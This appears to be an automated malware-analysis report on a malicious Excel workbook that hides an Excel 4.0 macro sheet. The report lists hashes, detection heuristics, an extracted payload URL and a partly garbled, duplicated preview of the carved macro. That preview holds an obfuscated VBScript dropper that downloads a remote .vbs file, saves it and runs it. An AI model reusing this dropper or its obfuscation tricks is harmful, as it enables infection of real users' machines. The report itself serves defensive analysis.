Office (OOXML) / .XLSX malware analysis — malicious · 1ec1cc958005b77e

MALICIOUS

Office (OOXML) / .XLSX

429.9 KB Created: 2025-07-15 07:44:31 UTC Authoring application: Microsoft Excel 15.0300 First seen: 2026-05-13

MD5: 3a373cee613155ed534cd43876db4793 SHA-1: 5f3ea9abf18937862833e46aa38fe8e6988cb545 SHA-256: 1ec1cc958005b77e4c8ef402355f4a7b83c6827f720a11ca10e75a8ed84e47f7

182 Risk Score

Heuristics 4

Excel 4.0 macro sheet (1 sheet(s)) critical 2 related findings OOXML_XLM_MACROSHEET

Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks. The macro sheet is stored as XLSB/BIFF12 binary content, which many XML-only OOXML scanners miss.
XLM payload reassembled from CHAR()/split formulas critical OOXML_XLM_REASSEMBLED_PAYLOAD

An Excel 4.0 macro sheet builds its payload inside the formula token stream by concatenating per-character CHAR() calls and string fragments, so no WinAPI name, shell command, or URL is ever contiguous in the .bin for a literal-bytes scan to find. Reassembling the formulas recovered download/execute API names, LOLBin commands (regsvr32/rundll32/mshta/wmic/powershell), or a payload URL — the de-obfuscated download-and-run kill chain.
URL reconstructed from XLM cell array (1 URL) critical OOXML_XLM_CELL_ARRAY_URL

Excel 4.0 macro sheet stages its payload URL across individual numeric cells (one ASCII charcode per cell), inside an embedded HTA that uses VBScript Chr()/&-concat obfuscation, or split across multi-char fragment cells a download formula concatenates by reference (=A1&A2&… / CONCATENATE(...)). The reconstructed URL is invisible to literal-bytes URL extraction because it is never contiguous in the workbook stream. URLs were recovered by walking the BIFF12 record stream of every worksheet and macrosheet part and decoding RK/inline-string/shared-string cells in row-major and column-major order plus FORMULA cell-reference concatenation in token order.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://astaoffices.com/ms/md.vbs Referenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

xlm_sheet_00.bin xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/sheet1.bin 3303 bytes

Filename	Kind	Source	Size
`xlm_sheet_00.bin`	xlm-macrosheet	OOXML XLM macro sheet: xl/macrosheets/sheet1.bin	3303 bytes
SHA-256: `bd5e8ce2dc81a135b234c07676a4520dab881fbac0655fc44db18060bcb1364f`
Preview script First 1,000 lines of the extracted script � � � @ �� b x � � � � @ d � $ � � % �� & � �� < � � � % �� & b S @ k f u C : \ U s e r s \ P u b l i c \ B X % �� & c H 5 f i l C f i 7 r e r . v b s B � B X % �� & d F 3 C O n E r r o r R e s u m e N e x t A� % �� & e @ - C b k 3 5 h u = " m i c r O s " A� % �� & f : ' C p l d d r f = " a D o " A� % �� & g @ - C q f v p a p = " d b . s T r " A� % �� & h H 5 C v q c 3 4 g = " o f t . x m l h " A� % �� & i @ - C a 2 m r w b = " Dj � " A� % �� & j � � C > d i m u z h 3 r i : S e t u z h 3 r i = c r e a t e o b j e c t ( p l d d r f & q f v p a p & " e a m " ) A� % �� & k � � C > d i m s m 8 a t s : S e t s m 8 a t s = c r e a t e o b j e c t ( b k 3 5 h u & v q c 3 4 g & " T T P " ) A� % �� & l ^ K C s m 8 a t s . O p e n " G E T " , a 2 m r w b , F a l s e A� % �� & m 4 ! C s m 8 a t s . S e n d A� % �� & n 4 ! C w i t h u z h 3 r i A� % �� & o 8 % C . t y p e = 1 A� % �� & p 0 C . o p e n A� % �� & q Z G C . w r i t e s m 8 a t s . r e s p o n s e B o d y A� % �� & r l Y C . s a v e t o f i l e " C M s w o r d s . v b s " , 2 A� % �� & s . C e n d w i t h A� % �� & t � � C G e t O 3 b j e c t ( " n e w : 1 3 7 0 9 6 2 0 - C 2 7 9 - 1 1 C E - A 4 9 E - 4 4 4 5 5 3 5 4 0 0 0 0 " ) . O p e n ( " C M s w o r d s . v b s " ) A� % �� & u 0 C E r r . C l e a r A� % �� & v C A� % �� & w P = w s c r i p t C f i 7 r e r . v b s B n % �� & x B 6 � � � �� @ ��F>�� 04 u-H�"F��[�-D��ȃ��N � ��;W�<X��R��j��E�� X�uh �7� �� ,L �SX��$� S H A - 5 1 2 � B � � 0ffffff�?ffffff�? �? �?333333�?333333�?�

SHA-256: bd5e8ce2dc81a135b234c07676a4520dab881fbac0655fc44db18060bcb1364f

Preview script

First 1,000 lines of the extracted script

�  �  �   @      ��������    �  b   x           �  �  �         �   @   d           � $                                    �  �  %      ��    & �  ����        �  <     �             �  �  %      ��    &   b                        
S           @          k f u    C :    \ U s e     r s \ P u b     l i c \  B X     %      ��    &   c                        
H           5          f i l C     
 f i 7 r e r . v b s     B � B X     %      ��    &   d                         F           3   C       O n   E r r o r   R e s u m e   N e x t A�     %      ��    &   e                         @           -   C       b k 3 5 h u   =   " m i c r O s " A�     %      ��    &   f                         :           '   C       p l d d r f   =   " a D o " A�     %      ��    &   g                         @           -   C       q f v p a p   =   " d b . s T r " A�     %      ��    &   h                         H           5   C       v q c 3 4 g   =   " o f t . x    m l h "  A�     %      ��    &   i                         @           -   C     
 a 2 m r w b   =   " Dj    �    "  A�     %      ��    &   j                         �            �   C     > d i m   u z h 3 r i :   S e t   u z h 3 r i   =   c r e a t e o b j e c t ( p l d d r f   &   q f v p a p   &   " e a m " ) A�                   %      ��    &   k                         �            �   C     > d i m   s m 8 a t s :   S e t   s m 8 a t s   =   c r e a t e o b j e c t ( b k 3 5 h u   &   v q c 3 4 g   &   " T T P " ) A�     %      ��    &   l                         ^           K   C       s m 8 a t s . O p e n   " G E T " ,   a 2 m r w b ,   F a l s e A�     %      ��    &   m                         4           !   C       s m 8 a t s . S e n d A�     %      ��    &   n                         4           !   C       w i t h   u z h 3 r i A�     %      ��    &   o                         8           %   C     
         . t y p e   =   1 A�     %      ��    &   p                         0               C     	         . o p e n A�     %      ��    &   q                         Z           G   C               . w r i t e   s m 8 a t s . r e s p o n s e B o d y A�     %      ��    &   r                         l           Y   C     
         . s a v e t o f i    l e   "  C        M s w o r d s . v b s " ,   2  A�     %      ��    &   s                         .               C       e n d   w i t h A�     %      ��    &   t                         �            �   C       G e t O  3 b j e c t ( " n e w : 1 3 7 0 9 6 2 0 - C 2 7 9 - 1 1 C E - A 4 9 E - 4 4 4 5 5 3 5 4 0 0 0 0 " ) . O     p     e n ( "  C      
 M s w o r d s . v b s " )  A�     %      ��    &   u                         0               C     	 E r r . C l e a r A�     %      ��    &   v                                         C    A�     %      ��    &   w                         P           =      w s    c r i p t    C        f i 7 r e r . v     b s  B n     %      ��    &   x                        
                B 6     �  � � ��                                                                  @     ��F>�� 04 u-H�"F��[�-D���ȃ��N � ��;W�<X��R��j��E�� X�uh �7�    ����� ,L
�SX��$�    S H A - 5 1 2 � B                                                                  �    � 0ffffff�?ffffff�?      �?      �?333333�?333333�?�

Open this report in the interactive analyzer, or submit your own file for analysis.